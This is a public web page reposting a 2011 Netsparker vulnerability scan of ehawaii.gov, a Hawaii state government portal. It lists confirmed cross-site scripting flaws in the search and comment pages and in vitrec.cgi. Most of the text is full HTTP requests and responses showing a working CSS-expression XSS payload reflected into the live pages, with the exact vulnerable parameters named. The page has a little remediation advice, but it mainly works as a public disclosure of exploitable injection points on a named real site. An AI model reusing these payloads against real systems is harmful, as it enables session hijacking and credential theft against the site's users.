ehawaii.gov, XSS, GHDB DORK REPORT SUMMARY

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler
Loading
Netsparker - Scan Report Summary
TARGET URL
https://www.ehawaii.gov/efile
SCAN DATE
4/30/2011 5:16:49 PM
REPORT DATE
4/30/2011 5:44:14 PM
SCAN DURATION
00:25:29
22
identified
15
confirmed
0
critical
5
informational

GHDB DORK Tests

Scan Settings
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

GHDB, DORK VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
IMPORTANT
45 %
LOW
32 %
INFORMATION
23 %

GHDB, DORK VULNERABILITY SUMMARY

Vulnerability Summary
URL Parameter Method Vulnerability Confirmed
/dakine/ Cookie Not Marked As HttpOnly Yes
Apache Coyote Version Disclosure No
/dakine/comment.html applicationId GET Cross-site Scripting Yes
applicationId POST Cross-site Scripting Yes
applicationId POST Cross-site Scripting Yes
applicationId POST Cross-site Scripting Yes
applicationId POST Cross-site Scripting Yes
/dakine/css/ Tomcat Version Disclosure No
Directory Listing (Tomcat) No
/dakine/docs/subscription.html E-mail Address Disclosure No
/dakine/search.html q GET Cross-site Scripting Yes
q GET Cross-site Scripting Yes
q GET Cross-site Scripting Yes
Cookie Not Marked As Secure Yes
/dlnr/fish/exe/fish.cgi Internal Server Error Yes
[Possible] Internal Path Leakage (*nix) No
/doh/vitrec/exe/vitrec.cgi session_id POST Cross-site Scripting Yes
Redirect Response BODY Is Too Large Yes
/doh/vitrec/html/contact.html.old [Possible] Backup File Found No
/doh/vitrec/html/down.html.old [Possible] Backup File Found No
/efile/ Auto Complete Enabled Yes
/efile/images/ Forbidden Resource Yes
Cross-site Scripting

Cross-site Scripting

9 TOTAL
IMPORTANT
CONFIRMED
9
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /dakine/comment.html

/dakine/comment.html CONFIRMED

http://www.ehawaii.gov/dakine/comment.html?applicationId=%22%20stYle=%22x:expre/**/ssion(alert(9))

Parameters

Parameter Type Value
applicationId GET " stYle="x:expre/**/ssion(alert(9))

Request

GET /dakine/comment.html?applicationId=%22%20stYle=%22x:expre/**/ssion(netsparker(9)) HTTP/1.1
Referer: https://www.ehawaii.gov/efile/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.ehawaii.gov
Cookie: JSESSIONID=1731BAF4F2FFEE93C41B3C6778764B97.olomea
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 22:18:04 GMT
Server: Apache-Coyote/1.1
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Transfer-Encoding: chunked


<?xml version="1.0"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><title>ehawaii.gov | Comments & Feedback</title><link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" /><link rel="stylesheet" type="text/css" href="/dakine/css/main.css"/><!--[if lte IE 6]><link rel="stylesheet" type="text/css" href="/dakine/css/ie6.css"/><![endif]--><link href="/dakine/css/mobile.css" rel="stylesheet" type="text/css" media="handheld"><script type="text/javascript" src="/dakine/js/portal.js"></script></head><body><!-- START: Top Menu --><div id="top" align="center"> <div id="menu"> <ul> <li><a href="/dakine/search.html?tag=government" class="menu">Government</a></li> <li><a href="/dakine/search.html?tag=business" class="menu">Business</a></li> <li><a href="/dakine/search.html?tag=community" class="menu">Community</a></li> <li><a href="/dakine/search.html?tag=education" class="menu">Education</a></li> <li><a href="/dakine/search.html?tag=employment" class="menu">Employment</a></li> <li><a href="/dakine/search.html?tag=visiting" class="menu">Visiting</a></li> </ul> </div></div><!-- START: Header --><div id="header" align="center"> <div id="headerContent"> <div id="title"><a href="/dakine/index.html" class="noline"><img src="/dakine/images/title.jpg" border="0" alt="eHawaii.gov" /></a></div> <div id="seal"><a href="http://www.surveymonkey.com/s/hicredesign" class="noline"><img src="/dakine/images/hawaiisealandsurvey.jpg" border="0" alt="Survey" /></a></div> </div></div><!-- START: Subheader --><div id="subheader"> <div align="center"><div id="subheaderContent"> <span class="left"><span class="middle"><span class="right"> <div id="livehelp"><div id="ciMygb" style="z-index:100;position:absolute"></div><div id="scMygb" style="display:inline"></div><div id="sdMygb" style="display:none"></div><script type="text/javascript">var seMygb=document.createElement("script");seMygb.type="text/javascript";var seMygbs=(location.protocol.indexOf("https")==0?"https://secure.providesupport.com/image":"http://image.providesupport.com")+"/js/hic/safe-standard.js?ps_h=Mygb\u0026ps_t="+new Date().getTime()+"\u0026online-image=http%3A//www.ehawaii.gov/dakine/images/portal-online.gif\u0026offline-image=http%3A//www.ehawaii.gov/dakine/images/portal-offline.gif";setTimeout("seMygb.src=seMygbs;document.getElementById('sdMygb').appendChild(seMygb)",1)</script><noscript><div style="display:inline"><a href="http://www.providesupport.com?messenger=hic" class="noline">Customer Support Chat</a></div></noscript></div> <div id="search"><img src="/dakine/images/divider.gif" align="middle" /><img src="/dakine/images/magnifyingglass.jpg" align="middle" /><span class="searchText">Enter a few words describing the service you're looking for:</span> <form style="margin: 0; display: inline;" id="searchbox_012249442604008016873:fyi5sijjiuo" action="/dakine/search.html" method="get"> <input id="searchText" name="q" type="text" size="25" align="middle" value=""/>&nbsp;<select id="searchBy" name="searchby"> <option value="all" >All</option> <option value="tag" >Tags only</option> </select> <input type="hidden" name="cx" value="012249442604008016873:fyi5sijjiuo" /> <input type="hidden" name="cof" value="FORID:9" /> <input name="sa" type="submit" class="subhbutton" value="Search" /> </form> </div> </span></span></span> </div></div></div><center><!-- START: Content --><div id="container"><div align="center"><div id="columnLeftSubpg"> <div id="subpage"> <div id="feedback"> <form action="/dakine/comment.html" method="post" style="display:inline; margin:0;"> <input type="hidden" name="applicationId" value="" stYle="x:expre/**/ssion(netsparker(9))"/> <h1>Feedback</h1> <p>Did you find what you were looking for? <input name="foundLookingFor" type="radio" value="true" checked="checked"/> Yes <input name="foundLookingFor" type="radio" value="false" /> No</p> <p>If no, what were you looking for?<br /> <textarea name="lookingFor"></textarea> </p> <div id="linegrey"></div> <h3>Frequency</h3> <p>How often do you use eHawaiiGov?</p> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="20%" align="center" valign="middle" bgcolor="#D53269" class="white"> Daily</td> <td width="20%" align="center" valign="middle" bgcolor="#FF9000" class="white">Weekly</td> <td width="20%" align="center" valign="middle" bgcolor="#FFD520" class="white">Monthly</td> <td width="20%" align="center" valign="middle" bgcolor="#C1D93B" class="white">Sometimes</td> <td width="20%" align="center" valign="middle" bgcolor="#5EC5C2" class="white">My 1st Time</td> </tr> <tr> <td width="20%" align="center" valign="middle"><input name="frequency" type="radio" value="3" checked="checked"/></td> <td width="20%" align="center" valign="middle"><input name="frequency" type="radio" value="4" /></td> <td width="20%" align="center" valign="middle"><input name="frequency" type="radio" value="5" /></td> <td width="20%" align="center" valign="middle"><input name="frequency" type="radio" value="6" /></td> <td width="20%" align="center" valign="middle"><input name="frequency" type="radio" value="7" /></td> </tr> </table> <div id="linegrey"></div> <h3>Ease of Use</h3> <p>Overall, how easy or difficult is it to use this site?</p> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="20%" align="center" valign="middle" bgcolor="#D53269" class="white">1 - Very Easy </td> <td width="20%" align="center" valign="middle" bgcolor="#FF9000" class="white">2</td> <td width="20%" align="center" valign="middle" bgcolor="#FFD520" class="white">3</td> <td width="20%" align="center" valign="middle" bgcolor="#C1D93B" class="white">4</td> <td width="20%" align="center" valign="middle" bgcolor="#5EC5C2" class="white">5 - Difficult</td> </tr> <tr> <td width="20%" align="center" valign="middle"><input name="ease" type="radio" value="3" checked="checked"/></td> <td width="20%" align="center" valign="middle"><input name="ease" type="radio" value="4" /></td> <td width="20%" align="center" valign="middle"><input name="ease" type="radio" value="5" /></td> <td width="20%" align="center" valign="middle"><input name="ease" type="radio" value="6" /></td> <td width="20%" align="center" valign="middle"><input name="ease" type="radio" value="7" /></td> </tr> </table> <div id="linegrey"></div> <h3>Navigation</h3> <p>Can information be located quickly and easily?</p> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td align="center" valign="middle" bgcolor="#D53269" class="white">1 - Very Easy</td> <td align="center" valign="middle" bgcolor="#FF9000" class="white">2</td> <td align="center" valign="middle" bgcolor="#FFD520" class="white">3</td> <td align="center" valign="middle" bgcolor="#C1D93B" class="white">4</td> <td align="center" valign="middle" bgcolor="#5EC5C2" class="white"> 5 - Difficult</td> </tr> <tr> <td width="20%" align="center" valign="middle"><input name="navigation" type="radio" value="3" checked="checked"/></td> <td width="20%" align="center" valign="middle"><input name="navigation" type="radio" value="4" /></td> <td width="20%" align="center" valign="middle"><input name="navigation" type="radio" value="5" /></td> <td width="20%" align="center" valign="middle"><input name="navigation" type="radio" value="6" /></td> <td width="20%" align="center" valign="middle"><input name="navigation" type="radio" value="7" /></td> </tr> </table> <div id="linegrey"></div> <h3>Appearance</h3> <p>Do you find the layout, design, colors and presentation of content attractive and pleasing?</p> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td align="center" valign="middle" bgcolor="#D53269" class="white">1 - Very Attractive</td> <td align="center" valign="middle" bgcolor="#FF9000" class="white">2</td> <td align="center" valign="middle" bgcolor="#FFD520" class="white">3</td> <td align="center" valign="middle" bgcolor="#C1D93B" class="white">4</td> <td align="center" valign="middle" bgcolor="#5EC5C2" class="white"> 5 - Unattractive</td> </tr> <tr> <td width="20%" align="center" valign="middle"><input name="appearance" type="radio" value="3" checked="checked"/></td> <td width="20%" align="center" valign="middle"><input name="appearance" type="radio" value="4" /></td> <td width="20%" align="center" valign="middle"><input name="appearance" type="radio" value="5" /></td> <td width="20%" align="center" valign="middle"><input name="appearance" type="radio" value="6" /></td> <td width="20%" align="center" valign="middle"><input name="appearance" type="radio" value="7" /></td> </tr> </table> <div id="linegrey"></div> <h3>Content</h3> <p>Was the information adequate for your needs?</p> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="20%" align="center" valign="middle" bgcolor="#D53269" class="white">1 - Excellent</td> <td width="20%" align="center" valign="middle" bgcolor="#FF9000" class="white">2</td> <td width="20%" align="center" valign="middle" bgcolor="#FFD520" class="white">3</td> <td width="20%" align="center" valign="middle" bgcolor="#C1D93B" class="white">4</td> <td width="20%" align="center" valign="middle" bgcolor="#5EC5C2" class="white"> 5 - Poor</td> </tr> <tr> <td width="20%" align="center" valign="middle"><input name="content" type="radio" value="3" checked="checked"/></td> <td width="20%" align="center" valign="middle"><input name="content" type="radio" value="4" /></td> <td width="20%" align="center" valign="middle"><input name="content" type="radio" value="5" /></td> <td width="20%" align="center" valign="middle"><input name="content" type="radio" value="6" /></td> <td width="20%" align="center" valign="middle"><input name="content" type="radio" value="7" /></td> </tr> </table> <div id="linegrey"></div> <p>How did you find out about us?</p> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="33%" align="left" valign="top"><input type="checkbox" name="referrals" value="8" /> Newspaper Article <br /> <input type="checkbox" name="referrals" value="9" /> Government Agency <br /> <input type="checkbox" name="referrals" value="10" /> Television<br /> <input type="checkbox" name="referrals" value="11" /> Radio</td> <td width="33%" align="left" valign="top"><input type="checkbox" name="referrals" value="12" /> Direct Mail <br /> <input type="checkbox" name="referrals" value="13" /> Conference or Trade Show <br /> <input type="checkbox" name="referrals" value="14" /> AOL<br /> <input type="checkbox" name="referrals" value="15" /> Search Engine </td> <td width="33%" align="left" valign="top"><input type="checkbox" name="referrals" value="16" /> Referred by friend or colleague <br /> <input type="checkbox" name="referrals" value="17" /> Advertisement<br /> <input type="checkbox" name="referrals" value="18" /> Link from another website <br /> <input type="checkbox" name="referrals" value="19" /> Other</td> </tr> </table> <div id="linegrey"></div> Would you use this online service again? <input name="useServiceAgain" type="radio" value="true" checked="checked"/> Yes <input name="useServiceAgain" type="radio" value="false" /> No</p> <div id="linegrey"></div> What other Hawaii government services would you like to see online? <br /> <textarea name="otherServices"></tex..
- /dakine/search.html

/dakine/search.html CONFIRMED

http://www.ehawaii.gov/dakine/search.html?cof=FORID%3a9&cx=012249442604008016873%3afyi5sijjiuo&q=%22..

Parameters

Parameter Type Value
cof GET FORID:9
cx GET 012249442604008016873:fyi5sijjiuo
q GET " stYle="x:expre/**/ssion(alert(9))
sa GET Search
searchby GET all

Request

GET /dakine/search.html?cof=FORID%3a9&cx=012249442604008016873%3afyi5sijjiuo&q=%22%20stYle=%22x:expre/**/ssion(netsparker(9))%20&sa=Search&searchby=all HTTP/1.1
Referer: http://www.ehawaii.gov/dakine/index.html
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.ehawaii.gov
Cookie: JSESSIONID=7A89B0309B3AF0F635B2B3BE93BE988E.liona
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 22:19:17 GMT
Server: Apache-Coyote/1.1
Content-Encoding:
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 2272


<?xml version="1.0"?><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>ehawaii.gov | Search Results</title><!-- Meta Tags --><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><meta name="keywords" content="Hawaii.gov, Hawaii state portal, government" /><meta name="description" content="Connecting You to Hawai`i State Government. Online Services, Why wait inline? Get it done online." /><link rel="shortcut icon" href="/dakine/favicon.ico" type="image/x-icon" /><link rel="stylesheet" type="text/css" href="/dakine/css/main.css"/><link href="/dakine/css/mobile.css" rel="stylesheet" type="text/css" media="handheld"><!--[if lte IE 6]><link rel="stylesheet" type="text/css" href="/dakine/css/ie6.css"/><![endif]--><!--Calendar CSS file--><script type="text/javascript" src="/dakine/js/portal.js"></script></head><body><!-- START: Top Menu --><div id="top" align="center"> <div id="menu"> <ul> <li><a href="/dakine/search.html?tag=government" class="menu">Government</a></li> <li><a href="/dakine/search.html?tag=business" class="menu">Business</a></li> <li><a href="/dakine/search.html?tag=community" class="menu">Community</a></li> <li><a href="/dakine/search.html?tag=education" class="menu">Education</a></li> <li><a href="/dakine/search.html?tag=employment" class="menu">Employment</a></li> <li><a href="/dakine/search.html?tag=visiting" class="menu">Visiting</a></li> </ul> <div id="weather"> <div><span class="content"><span class="temperature">Honolulu:&nbsp;81.0 F (27.2 C)&nbsp;Partly Cloudy</span></span></div> </div> </div></div><!-- START: Header --><div id="header" align="center"> <div id="headerContent"> <div id="title"><a href="/dakine/index.html" class="noline"><img src="/dakine/images/title.jpg" border="0" alt="eHawaii.gov" /></a></div> <div id="seal"><a href="http://www.surveymonkey.com/s/hicredesign" class="noline"><img src="/dakine/images/hawaiisealandsurvey.jpg" border="0" alt="Survey" /></a></div> </div></div><!-- START: Subheader --><div id="subheader"> <div align="center"><div id="subheaderContent"> <span class="left"><span class="middle"><span class="right"> <div id="livehelp"><div id="ciMygb" style="z-index:100;position:absolute"></div><div id="scMygb" style="display:inline"></div><div id="sdMygb" style="display:none"></div><script type="text/javascript">var seMygb=document.createElement("script");seMygb.type="text/javascript";var seMygbs=(location.protocol.indexOf("https")==0?"https://secure.providesupport.com/image":"http://image.providesupport.com")+"/js/hic/safe-standard.js?ps_h=Mygb\u0026ps_t="+new Date().getTime()+"\u0026online-image=http%3A//www.ehawaii.gov/dakine/images/portal-online.gif\u0026offline-image=http%3A//www.ehawaii.gov/dakine/images/portal-offline.gif";setTimeout("seMygb.src=seMygbs;document.getElementById('sdMygb').appendChild(seMygb)",1)</script><noscript><div style="display:inline"><a href="http://www.providesupport.com?messenger=hic" class="noline">Customer Support Chat</a></div></noscript></div> <div id="search"><img src="/dakine/images/divider.gif" align="middle" /><img src="/dakine/images/magnifyingglass.jpg" align="middle" /><span class="searchText">Enter a few words describing the service you're looking for:</span> <form style="margin: 0; display: inline;" id="searchbox_012249442604008016873:fyi5sijjiuo" action="/dakine/search.html" method="get"> <input id="searchText" name="q" type="text" size="25" align="middle" value="" stYle="x:expre/**/ssion(netsparker(9)) "/>&nbsp;<select id="searchBy" name="searchby"> <option value="all" >All</option> <option value="tag" >Tags only</option> </select> <input type="hidden" name="cx" value="012249442604008016873:fyi5sijjiuo" /> <input type="hidden" name="cof" value="FORID:9" /> <input name="sa" type="submit" class="subhbutton" value="Search" /> </form> </div> </span></span></span> </div></div></div><center><!-- START: Content --><style type="text/css"> #columnLeftSubpg #subpage iframe { width: 670px; }</style><div id="container" > <div align="center"> <div id="columnRight"> <span class="content"> <p><a href="http://www.surveymonkey.com/s.aspx?sm=EHRSFlWd8uD8yxHM01CuIQ_3d_3d" class="noline"><img src="/dakine/images/feedback.jpg" border="0" alt="Feedback" /></a><a href="#" class="noline"></a></p> </div></span></div> <div id="columnLeftSubpg"> <div id="subpage"> <div id="results_012249442604008016873:fyi5sijjiuo"></div> </div> </div> <script type="text/javascript"> var googleSearchIframeName = "results_012249442604008016873:fyi5sijjiuo"; var googleSearchFormName = "searchbox_012249442604008016873:fyi5sijjiuo"; var googleSearchFrameborder = 0; var googleSearchDomain = "google.com"; var googleSearchPath = "/cse"; </script> <script type="text/javascript" src="http://www.google.com/afsonline/show_afs_search.js"></script> </div></div><!-- START: Footer --></center></div><div id="footer" > <div id="footerContent" ><a href="/dakine/docs/about.html" class="copyrightLink">About Us</a><span class="copyrightDivider">|</span><a href="/dakine/docs/subscription.html" class="copyrightLink">Subscription Services</a><span class="copyrightDivider">|</span><a href="/dakine/docs/ada.html" class="copyrightLink">ADA Compliance</a><span class="copyrightDivider">|</span><a href="/dakine/docs/terms.html" class="copyrightLink">Terms of Use</a><span class="copyrightDivider">|</span><a href="/dakine/docs/privacy.html" class="copyrightLink">Privacy Policy</a><span class="copyrightDivider">|</span><a href="/dakine/docs/text.html" class="copyrightLink">Text Version</a><span class="copyrightDivider">|</span><a href="http://www.surveymonkey.com/s.aspx?sm=EHRSFlWd8uD8yxHM01CuIQ_3d_3d" class="copyrightLink">Feedback</a><br /> <span class="copyrighttext">&copy; 2010 HAWAII INFORMATION CONSORTIUM, LLC.</span> </div></div></div><script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script><script type="text/javascript">_uacct = "UA-939376-1";urchinTracker();</script></body></html>
- /dakine/search.html

/dakine/search.html CONFIRMED

https://www.ehawaii.gov/dakine/search.html?q=%22%20stYle=%22x:expre/**/ssion(alert(9))%20&searchby=t..

Parameters

Parameter Type Value
q GET " stYle="x:expre/**/ssion(alert(9))
searchby GET tag
cx GET 012249442604008016873:fyi5sijjiuo
cof GET FORID:9

Request

GET /dakine/search.html?q=%22%20stYle=%22x:expre/**/ssion(netsparker(9))%20&searchby=tag&cx=012249442604008016873%3Afyi5sijjiuo&cof=FORID%3A9 HTTP/1.1
Referer: https://www.ehawaii.gov/efile/images/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.ehawaii.gov
Cookie: JSESSIONID=D4D0BDD1267BC9D9DEF203824D541974.olomea
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 30 Apr 2011 22:19:31 GMT
Server: Apache-Coyote/1.1
Content-Encoding:
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 2297
Connection: close


<?xml version="1.0"?><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>ehawaii.gov | Search Results</title><!-- Meta Tags --><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><meta name="keywords" content="Hawaii.gov, Hawaii state portal, government" /><meta name="description" content="Connecting You to Hawai`i State Government. Online Services, Why wait inline? Get it done online." /><link rel="shortcut icon" href="/dakine/favicon.ico" type="image/x-icon" /><link rel="stylesheet" type="text/css" href="/dakine/css/main.css"/><link href="/dakine/css/mobile.css" rel="stylesheet" type="text/css" media="handheld"><!--[if lte IE 6]><link rel="stylesheet" type="text/css" href="/dakine/css/ie6.css"/><![endif]--><!--Calendar CSS file--><script type="text/javascript" src="/dakine/js/portal.js"></script></head><body><!-- START: Top Menu --><div id="top" align="center"> <div id="menu"> <ul> <li><a href="/dakine/search.html?tag=government" class="menu">Government</a></li> <li><a href="/dakine/search.html?tag=business" class="menu">Business</a></li> <li><a href="/dakine/search.html?tag=community" class="menu">Community</a></li> <li><a href="/dakine/search.html?tag=education" class="menu">Education</a></li> <li><a href="/dakine/search.html?tag=employment" class="menu">Employment</a></li> <li><a href="/dakine/search.html?tag=visiting" class="menu">Visiting</a></li> </ul> <div id="weather"> <div><span class="content"><span class="temperature">Honolulu:&nbsp;81.0 F (27.2 C)&nbsp;Partly Cloudy</span></span></div> </div> </div></div><!-- START: Header --><div id="header" align="center"> <div id="headerContent"> <div id="title"><a href="/dakine/index.html" class="noline"><img src="/dakine/images/title.jpg" border="0" alt="eHawaii.gov" /></a></div> <div id="seal"><a href="http://www.surveymonkey.com/s/hicredesign" class="noline"><img src="/dakine/images/hawaiisealandsurvey.jpg" border="0" alt="Survey" /></a></div> </div></div><!-- START: Subheader --><div id="subheader"> <div align="center"><div id="subheaderContent"> <span class="left"><span class="middle"><span class="right"> <div id="livehelp"><div id="ciMygb" style="z-index:100;position:absolute"></div><div id="scMygb" style="display:inline"></div><div id="sdMygb" style="display:none"></div><script type="text/javascript">var seMygb=document.createElement("script");seMygb.type="text/javascript";var seMygbs=(location.protocol.indexOf("https")==0?"https://secure.providesupport.com/image":"http://image.providesupport.com")+"/js/hic/safe-standard.js?ps_h=Mygb\u0026ps_t="+new Date().getTime()+"\u0026online-image=http%3A//www.ehawaii.gov/dakine/images/portal-online.gif\u0026offline-image=http%3A//www.ehawaii.gov/dakine/images/portal-offline.gif";setTimeout("seMygb.src=seMygbs;document.getElementById('sdMygb').appendChild(seMygb)",1)</script><noscript><div style="display:inline"><a href="http://www.providesupport.com?messenger=hic" class="noline">Customer Support Chat</a></div></noscript></div> <div id="search"><img src="/dakine/images/divider.gif" align="middle" /><img src="/dakine/images/magnifyingglass.jpg" align="middle" /><span class="searchText">Enter a few words describing the service you're looking for:</span> <form style="margin: 0; display: inline;" id="searchbox_012249442604008016873:fyi5sijjiuo" action="/dakine/search.html" method="get"> <input id="searchText" name="q" type="text" size="25" align="middle" value="" stYle="x:expre/**/ssion(netsparker(9)) "/>&nbsp;<select id="searchBy" name="searchby"> <option value="all" >All</option> <option value="tag" selected=selected>Tags only</option> </select> <input type="hidden" name="cx" value="012249442604008016873:fyi5sijjiuo" /> <input type="hidden" name="cof" value="FORID:9" /> <input name="sa" type="submit" class="subhbutton" value="Search" /> </form> </div> </span></span></span> </div></div></div><center><!-- START: Content --><style type="text/css"> #columnLeftSubpg #subpage iframe { width: 670px; }</style><div id="container" > <div align="center"><div id="columnLeftSR"> <span class="content"> <div id="matchingServices"> <h1 class="content">Matching Services</h1><span class="sr">Search results for:</span> <span class="sr2">" stYle="x:expre/**/ssion(netsparker(9)) </span><br/><br /><br/><br /><div id="linegrey"></div> No matches found. </div> </span></div><div id="columnRight"> <span class="content"> <p><a href="http://www.surveymonkey.com/s.aspx?sm=EHRSFlWd8uD8yxHM01CuIQ_3d_3d" class="noline"><img src="/dakine/images/feedback.jpg" border="0" alt="Feedback" /></a><a href="#" class="noline"></a></p> </div></span></div><div id="columnMiddleSR"> <span class="content"> <div id="matchingPages"> <h1 class="content">Matching Pages</h1><span class="sr">Search results for:</span> <span class="sr2">" stYle="x:expre/**/ssion(netsparker(9)) </span><br/><br /><br/><br /><div id="linegrey"></div> No matches found. </div> </span></div> </div></div><!-- START: Footer --></center></div><div id="footer" > <div id="footerContent" ><a href="/dakine/docs/about.html" class="copyrightLink">About Us</a><span class="copyrightDivider">|</span><a href="/dakine/docs/subscription.html" class="copyrightLink">Subscription Services</a><span class="copyrightDivider">|</span><a href="/dakine/docs/ada.html" class="copyrightLink">ADA Compliance</a><span class="copyrightDivider">|</span><a href="/dakine/docs/terms.html" class="copyrightLink">Terms of Use</a><span class="copyrightDivider">|</span><a href="/dakine/docs/privacy.html" class="copyrightLink">Privacy Policy</a><span class="copyrightDivider">|</span><a href="/dakine/docs/text.html" class="copyrightLink">Text Version</a><span class="copyrightDivider">|</span><a href="http://www.surveymonkey.com/s.aspx?sm=EHRSFlWd8uD8yxHM01CuIQ_3d_3d" class="copyrightLink">Feedback</a><br /> <span class="copyrighttext">&copy; 2010 HAWAII INFORMATION CONSORTIUM, LLC.</span> </div></div></div><script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script><script type="text/javascript">_uacct = "UA-939376-1";urchinTracker();</script></body></html>
- /dakine/comment.html

/dakine/comment.html CONFIRMED

http://www.ehawaii.gov/dakine/comment.html

Parameters

Parameter Type Value
appearance POST 3
applicationId POST " stYle="x:expre/**/ssion(alert(9))
content POST 3
ease POST 3
email POST netsparker@example.com
foundLookingFor POST true
frequency POST 3
lookingFor POST 3
navigation POST 3
otherServices POST 3
referrals POST 8
Submit2 POST Submit
suggestions POST 3
useServiceAgain POST true

Request

POST /dakine/comment.html HTTP/1.1
Referer: http://www.ehawaii.gov/dakine/comment.html?applicationId=73
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.ehawaii.gov
Cookie: JSESSIONID=45AB7CE33B53528DA29CD7A4155483C1.lono
Content-Length: 265
Accept-Encoding: gzip, deflate

appearance=3&applicationId=%22+stYle%3d%22x%3aexpre%2f**%2fssion(netsparker(9))+&content=3&ease=3&email=netsparker%40example.com&foundLookingFor=true&frequency=3&lookingFor=3&navigation=3&otherServices=3&referrals=8&Submit2=Submit&suggestions=3&useServiceAgain=true

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 22:20:25 GMT
Server: Apache-Coyote/1.1
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: JSESSIONID=6A46543EC1EFE98E36725C048DD124B4.liona; Path=/dakine
Transfer-Encoding: chunked


<?xml version="1.0"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><title>ehawaii.gov | Comments & Feedback</title><link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" /><link rel="stylesheet" type="text/css" href="/dakine/css/main.css"/><!--[if lte IE 6]><link rel="stylesheet" type="text/css" href="/dakine/css/ie6.css"/><![endif]--><link href="/dakine/css/mobile.css" rel="stylesheet" type="text/css" media="handheld"><script type="text/javascript" src="/dakine/js/portal.js"></script></head><body><!-- START: Top Menu --><div id="top" align="center"> <div id="menu"> <ul> <li><a href="/dakine/search.html?tag=government" class="menu">Government</a></li> <li><a href="/dakine/search.html?tag=business" class="menu">Business</a></li> <li><a href="/dakine/search.html?tag=community" class="menu">Community</a></li> <li><a href="/dakine/search.html?tag=education" class="menu">Education</a></li> <li><a href="/dakine/search.html?tag=employment" class="menu">Employment</a></li> <li><a href="/dakine/search.html?tag=visiting" class="menu">Visiting</a></li> </ul> </div></div><!-- START: Header --><div id="header" align="center"> <div id="headerContent"> <div id="title"><a href="/dakine/index.html" class="noline"><img src="/dakine/images/title.jpg" border="0" alt="eHawaii.gov" /></a></div> <div id="seal"><a 